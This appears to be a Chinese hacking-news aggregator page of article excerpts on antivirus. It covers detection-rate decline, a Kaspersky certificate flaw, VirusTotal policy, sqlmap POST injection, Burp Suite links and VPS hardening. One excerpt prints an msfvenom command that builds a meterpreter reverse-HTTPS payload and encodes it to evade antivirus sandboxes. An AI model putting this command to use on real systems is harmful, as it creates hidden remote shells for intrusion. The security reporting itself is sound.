记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

杀毒软件到底怎么了?

反病毒软件在已知威胁和新威胁检测上都表现得越来越糟糕了吗? 我们来看一看反病毒检测率网站 Virus Bulletin 上公布的数据。Virus Bulletin 是行业首要试验场,其测试全面而持续,可供进行历史纵向对比。从2015到2016年,已知恶意软件平均检测率下降了几个百分点;而零日漏洞检测率则是大幅下降——从平均80%直降到70%及以下。 如果说杀毒软件尚未真正死亡,但至少已散发出垂暮的气息。说的直接一些就是,攻击者能够瞬时生成新的恶意软件,但反病毒厂商跟不上攻击者的速度。黑客已经完全自动化了该过程,现在根本就是工业级的恶意软件生产水平,每天都有百万计的新变种出现。现有杀毒引擎根本无法应付,这个战场上,杀毒厂商输得彻底。 业内很多同仁都看到了杀毒软件最近的问题,但这又是一个极难解决的问题。如果把杀软
发布时间:2017-01-31 19:00 | 阅读:150196 | 评论:0 | 标签:术有专攻 反病毒 威胁检测 杀毒软件

卡巴斯基反病毒产品现漏洞 可被中间人攻击

研究者发现,基于脆弱的32位签名的证书验证机制很容易受到不同站点相同签名的碰撞影响。 卡巴斯基实验室近期更新了反病毒产品,本次更新修补了致使用户易受流量劫持的漏洞。 谷歌的漏洞研究员塔维斯·奥尔曼迪最早发现这一漏洞,该漏洞存在于卡巴斯基杀毒软件用来检测加密链接内的潜在威胁时所用的SSL/TLS流量检测功能里。 和其他终端安全产品一样,卡巴斯基会在电脑上安装一个自签名的CA根证书,并用它延伸出的“叶”证书进行拦截访问,从而对用户访问的所有https可用的站点授予证书。这允许杀毒软件对本地浏览器和远程服务器之间的链接进行加/解密操作。 奥尔曼迪发现,每当卡巴斯基的反病毒产品生成一个拦截证书时,它会基于网站提供的原始证书序列号生成一个32位的密钥并缓存这一对应关系。而这一机制使得当用户再次访问同一网站时,杀毒软件会
发布时间:2017-01-11 01:30 | 阅读:122199 | 评论:0 | 标签:威胁情报 HTTPS 中间人攻击 卡巴斯基 反病毒 密钥 数字证书 漏洞

VirusTotal政策变化,点燃反恶意软件产业内战

VirusTotal近期的政策变化正加剧传统和新兴反恶意软件企业之间的敌对情绪。5月4日,VirusTotal对反恶意软件产业投下了一颗重磅炸弹,其余波至今未平。这颗炸弹就是VirusTotal政策中两个句子的变化:“所有搜索企业现在必须将其侦查扫描器整合进VirusTotal的公有界面,以通过VirusTotal API服务获取反恶意软件判定结果”。另一项改动是要求新来的申请者必须经过恶意软件测试标准组织 (Anti-Malware Testing Standards Organization, AMTSO) 的有效认证。背景要理解这两项改动的效果,我们必须理解以下四个元素:传统反恶意软件产业、新兴反恶意软件产业、VirusTotal、AMTSO。传统反恶意软件产业(以前被称为反病毒)自网络安全诞生之初就已经
发布时间:2016-05-16 20:50 | 阅读:82233 | 评论:0 | 标签:牛闻牛评 VirusTotal 反恶意软件 反病毒

2016网络威胁防护报告:终端防护革命时刻的到来?

过去几年中,传统安全解决方案在现代威胁面前表现不佳,企业安全官们一直苦于无法有效锁定被侵入的终端。更换或增减终端保护软件的计划一份刚刚发布的调查报告显示:9成IT安全决策者和实践者认为公司当前的解决方案不能提供足够的防护,称有更换或增强终端安全防护的计划。该比例去年还只有7成。上周二,为高科技厂商提供咨询营销业务的CyberEdge Group公司,发布了其第三份《年度网络威胁防御报告》。报告中,打算更换(42%)或增强(44%)当前终端防护解决方案的受访者达到了惊人的86%之多。该数字去年还只是67.3%。有趣的是,日本的受访对象似乎是最为坚定的终端防护翻新者,有93.2%称打算替换或增强他们的终端防御。很明显,公司企业受够了当前无能的终端防护解决方案。连续三年,受访者对他们当前终端安全防御的不满逐年增加。我
发布时间:2016-02-24 15:00 | 阅读:144478 | 评论:0 | 标签:行业动态 反病毒 安全威胁

这四种安全技术濒临淘汰

一涉及安全,公司企业要面对的往往是很棘手的问题。重大安全事件似乎在以惊人的速度发生——每两周便有大公司遭遇安全事件侵害的新闻爆上头条,而这甚至还没触及那成千上万起没引起媒体关注的部分。由于网络攻击比以往发生得更为频繁,采纳并使用来防止网络攻击的安全解决方案技术便成为了公司企业的当务之急。不要小看这项工作的艰巨程度,即使市场充斥各种流行、高端、甚至被称为最好的安全技术。现状是,太多的企业或机构使用的安全防护技术简直堪称古董。一份最近的调查报告显示,超过半数的企业承认其所用技术至少已有3年历史,11%的企业称其所用技术已达10岁或10岁以上高龄。这些老掉牙的(至少在理念上)安全技术,根本无力应对当今的安全挑战,更不用说未来。接下来,我们看看以下四项被许多前沿技术专家认为是已经过时或即将过时的安全技术:一、生物识别表
发布时间:2015-11-05 18:10 | 阅读:81611 | 评论:0 | 标签:牛观点 反病毒 口令 安全技术 生物识别 防火墙

Burp Suite Article

Burp Suite 1: Introduction http://kyrionhackingtutorials.com/2012/05/burp-suite-1-introduction-2/ Burp Suite 2: Proxy | Intruder http://kyrionhackingtutorials.com/2012/05/burp-suite-2-proxy-intruder/ Burp Suite 3: Remotely Interception http://kyrionhackingtutorials.com/2012/05/burp-suite-3-remotely-interception/ Burp Suite 4: Repeater http://k
发布时间:2013-01-07 21:24 | 阅读:114915 | 评论:0 | 标签:burpsuite Burp Suite DDoS攻击 代码审计 内网安全 反病毒 社会工程学 网络安全 网络技术 风险

Sqlmap POST型注入

这里举例的是一个登录点存在post型注入 常用的注入工具测试都木有成功 用火狐的Tamper Data插件修改提交 可以看到报错信息 确定注入是存在的 这里用sqlmap测试注入 首先抓包(如burpsuite)获取提交的参数信息保存为post-sql.txt -r 加载这个post request文件 -p 指定可测试的参数 相关: sqlmap使用笔记 http://blog.bug.cx/2012/06/15/sqlmap%e4%bd%bf%e7%94%a8%e7%ac%94%e8%ae%b0/   Related posts: Sqlmap plugin for BurpSuite 如何使用SQLMap绕过WAF sqlmap使用笔记 Related posts: Sqlmap plugin

Antivirus Sandbox Evasion-ultimate-payload.pl

http://funoverip.net/2012/02/antivirus-sandbox-evasion-part1/ $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ul
发布时间:2013-01-07 21:24 | 阅读:114577 | 评论:0 | 标签:metasploit DDoS攻击 msfencode msfpayload 代码审计 内网安全 反病毒 社会工程学

msf the pentest userguide 读书笔记 v2.pdf

http://forum.90sec.org/thread-3381-1-1.html msf_the_pentest_userguide_读书笔记_v2.pdf下载:msf_the_pentest_userguide_读书笔记_v2 作者写得不错  可以多看看 Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf

VPS常用安全设置

http://www.2cto.com/Article/201208/147987.html 新手及才接触VPS的朋友们看一下,主要是关于VPS安全方面相关内容的: 一、修改SSH端口 vi /etc/ssh/sshd_config 找到其中的#Port 22(第13行),去掉#,修改成Port 3333 使用如下命令,重启SSH服务,注:以后用新端口登陆。 service sshd restart 二、禁止ROOT登陆 先添加一个新帐号80st ,可以自定义: useradd 80st 给weidao 帐号设置密码: passwd 80st 仍旧是修改/etc/ssh/sshd_config文件,第39行:#PermitRootLogin yes,去掉前面的#,并把yes改成no,然后,重启SSH服务。以后,

高级SSH安全技巧.pdf

高级SSH安全技巧.pdf下载:高级SSH安全技巧 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云